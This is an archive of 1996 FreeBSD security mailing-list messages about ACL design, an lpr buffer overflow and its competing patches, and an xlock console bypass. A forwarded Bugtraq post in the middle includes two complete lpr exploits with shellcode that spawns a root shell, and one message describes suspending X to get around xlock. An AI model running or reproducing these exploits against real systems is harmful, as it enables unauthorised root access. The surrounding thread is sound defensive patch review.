Suspicion about denial of service attacks possible on IP. (fwd)" (Oct 23, 11:59am) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Darren Reed , steve@edmweb.com (Steve Reid) Subject: Re: [more bugtraq] Re: Suspicion about denial of service attacks possible on IP. (fwd) Cc: security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Oct 23, 11:59am, Darren Reed wrote: } Subject: Re: [more bugtraq] Re: Suspicion about denial of service attacks } In some mail from Steve Reid, sie said: } > } > Another from Bugtraq. Can anyone confirm or deny the last paragraph? } > } } I posted the patch recently and it was picked up and committed by one of the } FreeBSD team. I don't know what branch that went into, however... When I went to apply the patch to my copy of -stable, I noticed that it had already been applied. I would assume that it also has been applied to -current. --- Truck From owner-freebsd-security Thu Oct 24 16:10:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA29120 for security-outgoing; Thu, 24 Oct 1996 16:10:45 -0700 (PDT) Received: from xmission.xmission.com (softweyr@xmission.xmission.com [198.60.22.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA29115 for ; Thu, 24 Oct 1996 16:10:42 -0700 (PDT) Received: (from softweyr@localhost) by xmission.xmission.com (8.8.2/8.7.5) id RAA01706; Thu, 24 Oct 1996 17:10:35 -0600 (MDT) From: Softweyr LLC Message-Id: <199610242310.RAA01706@xmission.xmission.com> Subject: Re: Any FreeBSD security topics of interest? To: wollman@lcs.mit.edu (Garrett Wollman) Date: Thu, 24 Oct 1996 17:10:35 -0600 (MDT) Cc: security@freebsd.org, softweyr@xmission.xmission.com (Softweyr LLC) In-Reply-To: <9610221416.AA23679@halloran-eldar.lcs.mit.edu> from "Garrett Wollman" at Oct 22, 96 10:16:11 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > I have to say that I have always preferred AFS's per-directory ACL > semantics to the more commonly implemented per-file ACLs. AFS does > not use the group and other permission bits at all, but applies the > user bits as a mask against certain rights given by the ACL. The > permission bits in AFS ACLs are `rwidlka', for `read', `write', > `insert', `delete', `lookup', `lock', and `administer' (i.e., change > the ACL). This enables certain nice features such as authenticated > local mail delivery (make a directory with permissions `System:AnyUser > lik' and they can create new mail files in that directory but cannot > read, write, or delete existing ones; the owner of the file is the > authenticated sender). I had the opposite reaction the first time I read about them: why did they do this? The AFS ACL system does not, for instance, allow you to make a setuid-root executable that can be run by wes, sam, and DJ, but nobody else, unless you create a group that holds only those people and make it group executable. This leads to a lot of small special- purpose groups that have to be maintained. The per-file ACLs do demand more administration, but also allow more power and flexibility. The AFS model does show that we can implement more semantics that just read, write, and execute however. The overlaid semantics of rwx and sticky on directories could be eliminated by adding a 'delete' privilege to the file ACL, like VMS has. Lotsa design work to be done on this project, eh? ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.xmission.com/~softweyr softweyr@xmission.com From owner-freebsd-security Thu Oct 24 17:37:57 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA06924 for security-outgoing; Thu, 24 Oct 1996 17:37:57 -0700 (PDT) Received: from trapdoor.aracnet.com (trapdoor.aracnet.com [204.188.47.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA06919 for ; Thu, 24 Oct 1996 17:37:55 -0700 (PDT) Received: from eris.beattie.aracnet.com (ppp-u4.aracnet.com [204.188.47.133]) by trapdoor.aracnet.com (8.7.4/8.6.9) with SMTP id RAA22493; Thu, 24 Oct 1996 17:37:20 -0700 Date: Thu, 24 Oct 1996 17:36:47 -0700 (PDT) From: Brian Beattie X-Sender: beattie@eris.beattie.aracnet.com To: Softweyr LLC cc: Garrett Wollman , security@FreeBSD.ORG, Softweyr LLC Subject: Re: Any FreeBSD security topics of interest? In-Reply-To: <199610242310.RAA01706@xmission.xmission.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- On Thu, 24 Oct 1996, Softweyr LLC wrote: > > The AFS model does show that we can implement more semantics that just > read, write, and execute however. The overlaid semantics of rwx and > sticky on directories could be eliminated by adding a 'delete' privilege > to the file ACL, like VMS has. > > Lotsa design work to be done on this project, eh? ;^) > > Having implemented ACL's for UNIX and UNIX-like systems twice and worked with a third, I consider them to be a waste of time and resources. :-). I would put more effort into understanding the weaknesses of systems than in adopting band-aids developed for other systems. I think that the UNIX permissions as they stand are sufficent. Brian Beattie | From an MIT job ad "Applicants must also have http://www.aracnet.com/~beattie | extensive knowledge of UNIX, although they beattie@aracnet.com | should have sufficently good programming taste Fax (503)331-8186 | to not consider this an achievement." -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMnALiVQwtztGaITFAQEg8gQAyvJs90bu+7UNPz6O0NWA5aFzOf/EzZMN Qf5z6bDjKzeP1ALuZiwIqWiniFZsDnzxwbTduMEAnpKCyIMl0jlDeF4d+stXykeX NGl8CaNcVjRfQQ5T2jSTuWQunbdPiiYlQO2FmgcBvf7JP9QwyxK3XrSkgr7Y3+FH +eesb1jyQdY= =LCYg -----END PGP SIGNATURE----- From owner-freebsd-security Thu Oct 24 21:53:02 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA21219 for security-outgoing; Thu, 24 Oct 1996 21:53:02 -0700 (PDT) Received: from who.cdrom.com (who.cdrom.com [204.216.27.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA21198 for ; Thu, 24 Oct 1996 21:52:56 -0700 (PDT) Received: from GndRsh.aac.dev.com (GndRsh.aac.dev.com [198.145.92.241]) by who.cdrom.com (8.7.5/8.6.11) with ESMTP id VAA15074 for ; Thu, 24 Oct 1996 21:30:25 -0700 (PDT) Received: (from rgrimes@localhost) by GndRsh.aac.dev.com (8.7.5/8.7.3) id VAA09284; Thu, 24 Oct 1996 21:28:30 -0700 (PDT) From: "Rodney W. Grimes" Message-Id: <199610250428.VAA09284@GndRsh.aac.dev.com> Subject: Re: Any FreeBSD security topics of interest? In-Reply-To: <199610242310.RAA01706@xmission.xmission.com> from Softweyr LLC at "Oct 24, 96 05:10:35 pm" To: softweyr@xmission.com (Softweyr LLC) Date: Thu, 24 Oct 1996 21:28:30 -0700 (PDT) Cc: wollman@lcs.mit.edu, security@FreeBSD.ORG, softweyr@xmission.xmission.com X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > I have to say that I have always preferred AFS's per-directory ACL > > semantics to the more commonly implemented per-file ACLs. AFS does > > not use the group and other permission bits at all, but applies the > > user bits as a mask against certain rights given by the ACL. The > > permission bits in AFS ACLs are `rwidlka', for `read', `write', > > `insert', `delete', `lookup', `lock', and `administer' (i.e., change > > the ACL). This enables certain nice features such as authenticated > > local mail delivery (make a directory with permissions `System:AnyUser > > lik' and they can create new mail files in that directory but cannot > > read, write, or delete existing ones; the owner of the file is the > > authenticated sender). > > I had the opposite reaction the first time I read about them: why did > they do this? The AFS ACL system does not, for instance, allow you to > make a setuid-root executable that can be run by wes, sam, and DJ, > but nobody else, unless you create a group that holds only those people > and make it group executable. This leads to a lot of small special- > purpose groups that have to be maintained. > > The per-file ACLs do demand more administration, but also allow more > power and flexibility. > > The AFS model does show that we can implement more semantics that just > read, write, and execute however. The overlaid semantics of rwx and > sticky on directories could be eliminated by adding a 'delete' privilege > to the file ACL, like VMS has. > > Lotsa design work to be done on this project, eh? ;^) Lotsa research should be done before _any_ design work. At a minimum I would look at 3 or 4 implementations that exist today, say for example the VMS you mentioned (has everything including the kitchen sink), Apollo (now HP) Domain/OS (but go to the real root of that design, Apollo Aegis, the first _real_ ``the network is the computer'' design), consider what AFS has implemented, and then someone like Primos or other unix ACL variant. Personally, I would do a mixed implemtation of Aegis ACLS, with the addition of file access alert classes and some of the other ``special'' VMS acls, and use the VMS Logic Name Table mechanism for ``variant'' ACL's (and added whistle by me :-)). I would retain the Aegis Initial default file and default directory ACL's. -- Rod Grimes rgrimes@gndrsh.aac.dev.com Accurate Automation, Inc. Reliable computers for FreeBSD From owner-freebsd-security Fri Oct 25 10:37:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA04534 for security-outgoing; Fri, 25 Oct 1996 10:37:35 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA04529 for ; Fri, 25 Oct 1996 10:37:27 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vGqC6-00023u-00; Fri, 25 Oct 1996 11:37:18 -0600 To: security@freebsd.org Subject: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit Date: Fri, 25 Oct 1996 11:37:18 -0600 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Here's a new LPR threat. I've come up with a patch that I'd like others on this list to vet. It is different than the one suggested by the author. I think it is better, but haven't thought through all the implications of it yet. Comments? Warner Index: lpr.c =================================================================== RCS file: /home/imp/FreeBSD/CVS/src/usr.sbin/lpr/lpr/lpr.c,v retrieving revision 1.7 diff -u -r1.7 lpr.c --- lpr.c 1996/05/11 19:00:55 1.7 +++ lpr.c 1996/10/25 17:32:12 @@ -466,9 +466,26 @@ register int c; register char *p2; { - char buf[BUFSIZ]; + static char *buf=0; + static int buflen=0; register char *p1 = buf; register int len = 2; + + /* + * Make sure that we have enough buffer for the card line to + * splat out. guard against huge requests running us out of + * memory (exit when this happens). + */ + if (buflen < strlen( p2 ) + 2) { + buflen = strlen( p2 ) + 2; + if (buflen < BUFSIZ) + buflen = BUFSIZ; + buf = buf ? realloc( buf, buflen ) : malloc( buflen ); + if (!buf) { + printf("Can't get buffer for card line\n"); + exit(1); + } + } *p1++ = c; while ((c = *p2++) != '\0') { ------- Forwarded Message [[ headers editied for length ]] Date: Fri, 25 Oct 1996 16:35:57 +0300 Reply-To: Vadim Kolontsov From: Vadim Kolontsov To: Multiple recipients of list BUGTRAQ Hello, there is a bug in berkeley-derived lpr, which allows attacker to get root access (see freebsd-security for details). Here is exploit for Linux (tested on 2.0.20), for BSD (tested on FreeBSD 2.1) and a patch. Best regards, Vadim. - -------------------------------------- linux_lpr_exploit.c ---------- #include #include #include #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 1023 long get_esp(void) { __asm__("movl %esp,%eax\n"); } void main() { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; int i; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + DEFAULT_OFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/bin/lpr", "lpr", "-C", buff, NULL); } - ------------------------------------------- bsd_lpr_exploit.c ------ #include #include #include #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 1023 long get_esp(void) { __asm__("movl %esp,%eax\n"); } void main() { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; int i; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + DEFAULT_OFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/bin/lpr", "lpr", "-C", buff, NULL); } - -------------------------------------------------------------------------- Here is a little patch -- see file lpr.c, function card(): ("!!" marks added lines) - -------------------------------------------------------------------------- static void card(c, p2) register int c; register char *p2; { char buf[BUFSIZ]; register char *p1 = buf; register int len = 2; if (strlen(p2) > BUFSIZ-2) /* !! */ { /* !! */ printf("No, thanks...\n"); /* !! */ exit(1); /* !! */ } *p1++ = c; while ((c = *p2++) != '\0') { *p1++ = (c == '\n') ? ' ' : c; len++; } *p1++ = '\n'; write(tfd, buf, len); } With best regards, Vadim. - -------------------------------------------------------------------------- Vadim Kolontsov SysAdm/Programmer Tver Regional Center of New Information Technologies Networks Lab ------- End of Forwarded Message From owner-freebsd-security Fri Oct 25 11:20:39 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA06648 for security-outgoing; Fri, 25 Oct 1996 11:20:39 -0700 (PDT) Received: from skynet.ctr.columbia.edu (skynet.ctr.columbia.edu [128.59.64.70]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA06640 for ; Fri, 25 Oct 1996 11:20:34 -0700 (PDT) Received: (from wpaul@localhost) by skynet.ctr.columbia.edu (8.6.12/8.6.9) id OAA26055; Fri, 25 Oct 1996 14:20:22 -0400 From: Bill Paul Message-Id: <199610251820.OAA26055@skynet.ctr.columbia.edu> Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit To: freebsd-security@freebsd.org Date: Fri, 25 Oct 1996 14:20:21 -0400 (EDT) Cc: imp@village.org X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Somebody bounced a copy of this just a short while ago through one of the Columbia sysadmin mailing lists. >+ /* >+ * Make sure that we have enough buffer for the card line to >+ * splat out. guard against huge requests running us out of >+ * memory (exit when this happens). >+ */ >+ if (buflen < strlen( p2 ) + 2) { >+ buflen = strlen( p2 ) + 2; >+ if (buflen < BUFSIZ) >+ buflen = BUFSIZ; >+ buf = buf ? realloc( buf, buflen ) : malloc( buflen ); >+ if (!buf) { >+ printf("Can't get buffer for card line\n"); >+ exit(1); >+ } >+ } You were far more charitable with your fix that I was. When I patched my machine at home, I just did this: *** /cdrom/usr/src/usr.sbin/lpr/lpr/lpr.c Sun Oct 8 13:39:17 1995 --- lpr.c Fri Oct 25 13:35:21 1996 *************** *** 481,487 **** register int len = 2; *p1++ = c; ! while ((c = *p2++) != '\0') { *p1++ = (c == '\n') ? ' ' : c; len++; } --- 481,487 ---- register int len = 2; *p1++ = c; ! while (p1 < (char *)&buf + BUFSIZ && (c = *p2++) != '\0') { *p1++ = (c == '\n') ? ' ' : c; len++; } Yes this will silently truncate the string, but if the printer subsystem isn't smart enough to deal with this gracefully then it's no damn good anyway. :) -Bill -- ============================================================================= -Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City ============================================================================= "If you're ever in trouble, go to the CTR. Ask for Bill. He will help you." ============================================================================= From owner-freebsd-security Fri Oct 25 11:23:09 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA06776 for security-outgoing; Fri, 25 Oct 1996 11:23:09 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA06771 for ; Fri, 25 Oct 1996 11:23:07 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vGquP-00027O-00; Fri, 25 Oct 1996 12:23:05 -0600 To: security@freebsd.org Subject: lpr hole in card() Date: Fri, 25 Oct 1996 12:23:05 -0600 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I've gone ahead and installed the OpenBSD fix, which is to truncate the buffer at BUFSIZ bytes (including the trailing '\n'). My patch is bogus: lpd might do something stupid as a result since it has a lot of BUFSIZ sized buffers in it. It also can change where the buffer is, and so it will overwrite free memory (assuming it doesn't dump core first time through). This one adds a check to make sure that we're writing inside the buffer. Here's the pseudo patch that I've applied to lpr.c. Comments? static void card(c, p2) register int c; register char *p2; { char buf[BUFSIZ]; register char *p1 = buf; register int len = 2; *p1++ = c; - while ((c = *p2++) != '\0') { + while ((c = *p2++) != '\0' && len <= sizeof(buf)) { *p1++ = (c == '\n') ? ' ' : c; len++; } *p1++ = '\n'; write(tfd, buf, len); } Warner From owner-freebsd-security Fri Oct 25 11:28:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA07061 for security-outgoing; Fri, 25 Oct 1996 11:28:29 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA07044 for ; Fri, 25 Oct 1996 11:28:20 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vGqzJ-00027v-00; Fri, 25 Oct 1996 12:28:09 -0600 To: Bill Paul Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit Cc: freebsd-security@freebsd.org In-reply-to: Your message of "Fri, 25 Oct 1996 14:20:21 EDT." <199610251820.OAA26055@skynet.ctr.columbia.edu> References: <199610251820.OAA26055@skynet.ctr.columbia.edu> Date: Fri, 25 Oct 1996 12:28:09 -0600 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <199610251820.OAA26055@skynet.ctr.columbia.edu> Bill Paul writes: : ! while (p1 < (char *)&buf + BUFSIZ && (c = *p2++) != '\0') { ... : Yes this will silently truncate the string, but if the printer subsystem : isn't smart enough to deal with this gracefully then it's no damn good : anyway. :) :-). I just installed a variation of this from OpenBSD. I think that the above patch has a fencepost error in it. What happens when you get more than BUFSIZ bytes? The first test will fail when buf is exactly full. However, one more byte is written after the loop ends, which will overflow onto the stack. Maybe it is harmless, but you never can tell. See my last mail in security for other reasons why my patch is completely bogus and for the patch I applied. lpd may not be able to handle the long lines due to its use of fixed buffers everywhere. Also, my patch dumps core the first time through the loop (that will teach me to post w/o testing :-). Warner From owner-freebsd-security Fri Oct 25 12:32:17 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA10297 for security-outgoing; Fri, 25 Oct 1996 12:32:17 -0700 (PDT) Received: from skynet.ctr.columbia.edu (skynet.ctr.columbia.edu [128.59.64.70]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id MAA10291 for ; Fri, 25 Oct 1996 12:32:13 -0700 (PDT) Received: (from wpaul@localhost) by skynet.ctr.columbia.edu (8.6.12/8.6.9) id PAA26175; Fri, 25 Oct 1996 15:31:53 -0400 From: Bill Paul Message-Id: <199610251931.PAA26175@skynet.ctr.columbia.edu> Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit To: imp@village.org (Warner Losh) Date: Fri, 25 Oct 1996 15:31:51 -0400 (EDT) Cc: freebsd-security@freebsd.org In-Reply-To: from "Warner Losh" at Oct 25, 96 12:28:09 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Of all the gin joints in all the towns in all the world, Warner Losh had to walk into mine and say: > In message <199610251820.OAA26055@skynet.ctr.columbia.edu> Bill Paul writes: > : ! while (p1 < (char *)&buf + BUFSIZ && (c = *p2++) != '\0') { > ... > : Yes this will silently truncate the string, but if the printer subsystem > : isn't smart enough to deal with this gracefully then it's no damn good > : anyway. :) > > :-). I just installed a variation of this from OpenBSD. I think that > the above patch has a fencepost error in it. What happens when you > get more than BUFSIZ bytes? The first test will fail when buf is > exactly full. However, one more byte is written after the loop ends, > which will overflow onto the stack. Maybe it is harmless, but you > never can tell. See my last mail in security for other reasons why my > patch is completely bogus and for the patch I applied. lpd may not be > able to handle the long lines due to its use of fixed buffers > everywhere. Also, my patch dumps core the first time through the loop > (that will teach me to post w/o testing :-). > > Warner Whups. Yeah, you're right. The assignment of the newline at the end didn't catch my eye for some reason. I suppose it should be: while (p1 < ((char *)&buf + BUFSIZ - 1) && (c = *p2++) != '\0') { In any event, overrunning the buffer by one byte and possibly dumping core is a little better than giving away a free root shell. :) FYI: this same bug is likely to be present in lpr on SunOS (well, duh), though obviously you'd need a different chunk of machine instructions to exploit it. -Bill -- ============================================================================= -Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City ============================================================================= "If you're ever in trouble, go to the CTR. Ask for Bill. He will help you." ============================================================================= From owner-freebsd-security Fri Oct 25 16:23:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA02439 for security-outgoing; Fri, 25 Oct 1996 16:23:40 -0700 (PDT) Received: from who.cdrom.com (who.cdrom.com [204.216.27.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA02433 for ; Fri, 25 Oct 1996 16:23:38 -0700 (PDT) Received: from glacier.cold.org (glacier.cold.org [206.81.134.54]) by who.cdrom.com (8.7.5/8.6.11) with ESMTP id QAA17579 for ; Fri, 25 Oct 1996 16:23:38 -0700 (PDT) Received: from localhost (brandon@localhost) by glacier.cold.org (8.7.5/8.7.3) with SMTP id RAA15480 for ; Fri, 25 Oct 1996 17:25:44 -0600 (MDT) Date: Fri, 25 Oct 1996 17:25:44 -0600 (MDT) From: Brandon Gillespie To: security@freebsd.org Subject: console locking in X windows.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I dont know if this has been brought up before, but most people get a false sense of security by using 'xlock' or similar programs to lock their X display while away from their console. However, it is likely they started X with 'startx'. If it was started with 'xdm' this problem is not relevant. Otherwise, all a person has to do is type 'CTRL-ALT-F1' to get back to the text-console they ran startx from (or the appropriate Fn key), and type ^Z. The X-server is then suspended and they have full access to the user's shell. Simple fix: alias 'startx' to 'exec /usr/X11R6/bin/startx' I realize this problem is not as 'impacting' as others may be, and is not necessarily specific to FreeBSD, but it does exist nonetheless 8) I would even go so far as to suggest a default alias in /etc/profile and /etc/csh.cshrc, in release versions. -Brandon Gillespie From owner-freebsd-security Fri Oct 25 16:41:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA04830 for security-outgoing; Fri, 25 Oct 1996 16:41:06 -0700 (PDT) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA04817 for ; Fri, 25 Oct 1996 16:41:03 -0700 (PDT) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id RAA00219; Fri, 25 Oct 1996 17:40:30 -0600 (MDT) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id RAA27998; Fri, 25 Oct 1996 17:37:21 -0600 (MDT) Date: Fri, 25 Oct 1996 17:37:20 -0600 (MDT) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Warner Losh cc: security@FreeBSD.ORG Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Fri, 25 Oct 1996, Warner Losh wrote: > Here's a new LPR threat. I've come up with a patch that I'd like > others on this list to vet. It is different than the one suggested by > the author. I think it is better, but haven't thought through all the > implications of it yet. > > Comments? I don't think it is worthwhile to bother with dynamic memory allocation for this. I think it is just as clean to simply exit, perhaps logging an error, if the string is too long. From owner-freebsd-security Fri Oct 25 16:47:47 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA05610 for security-outgoing; Fri, 25 Oct 1996 16:47:47 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id QAA05596 for ; Fri, 25 Oct 1996 16:47:43 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vGvyT-0002ew-00; Fri, 25 Oct 1996 17:47:37 -0600 To: Marc Slemko Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit Cc: security@freebsd.org In-reply-to: Your message of "Fri, 25 Oct 1996 17:37:20 MDT." References: Date: Fri, 25 Oct 1996 17:47:36 -0600 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Marc Slemko writes: : I don't think it is worthwhile to bother with dynamic memory allocation : for this. I think it is just as clean to simply exit, perhaps logging an : error, if the string is too long. Agreed. The more I thought about it, the more I realized that it was silly to allow long lines only here. And more error prone, since my patch actually introduced a new core dump :-(. I've commited the OpenBSD fix for this problem, btw, which silently truncates. Don't see a whole lot of reason for exiting in this case, but I have trouble articulating why. I can improve upon the OpenBSD fix, but at least that is one less lpr hole that is in FreeBSD. Warner From owner-freebsd-security Fri Oct 25 17:10:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA08580 for security-outgoing; Fri, 25 Oct 1996 17:10:29 -0700 (PDT) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA08573 for ; Fri, 25 Oct 1996 17:10:23 -0700 (PDT) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id SAA01832; Fri, 25 Oct 1996 18:10:19 -0600 (MDT) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id SAA28215; Fri, 25 Oct 1996 18:03:20 -0600 (MDT) Date: Fri, 25 Oct 1996 18:03:19 -0600 (MDT) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Warner Losh cc: security@FreeBSD.ORG Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Fri, 25 Oct 1996, Warner Losh wrote: > I've commited the OpenBSD fix for this problem, btw, which silently > truncates. Don't see a whole lot of reason for exiting in this case, > but I have trouble articulating why. I can improve upon the OpenBSD > fix, but at least that is one less lpr hole that is in FreeBSD. You can argue both ways, but I really don't think it matters too much. I do, however, really thinks that the idea logging things like this should be pursued; either someone is trying to breakin, which is bad, or someone is really trying to do something odd, in which case it would be nice to know why it wasn't working as it should. I would also suggest that perhaps it is even worth scrapping lpr entirely. There are numerous other security changes in the OpenBSD source tree, and even then I would bet there are still other problems with the code. Has anyone looked at LPRng in depth? (ftp://dickory.sdsu.edu/pub/LPRng/) I have serious doubts that the current BSD print system (ie. lpr & friends) is going to be made secure any time this century. Perhaps a wholescale replacement is in order? There is, of course, the disadvantage of becoming non-standard; LPRng uses different config files and works differently, so it isn't just a drop-in replacement. From owner-freebsd-security Fri Oct 25 17:17:44 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA09043 for security-outgoing; Fri, 25 Oct 1996 17:17:44 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id RAA09022 for ; Fri, 25 Oct 1996 17:17:34 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vGwQt-0002j6-00; Fri, 25 Oct 1996 18:16:59 -0600 To: Marc Slemko Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit Cc: security@freebsd.org In-reply-to: Your message of "Fri, 25 Oct 1996 18:03:19 MDT." References: Date: Fri, 25 Oct 1996 18:16:59 -0600 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Marc Slemko writes: : You can argue both ways, but I really don't think it matters too much. I : do, however, really thinks that the idea logging things like this should : be pursued; either someone is trying to breakin, which is bad, or someone : is really trying to do something odd, in which case it would be nice to : know why it wasn't working as it should. I was thinking that too. There are a lot of fixes in OpenBSD, and many of them are begging for a syslog to alert the system admin that you might be under attack. : I would also suggest that perhaps it is even worth scrapping lpr entirely. : There are numerous other security changes in the OpenBSD source tree, and 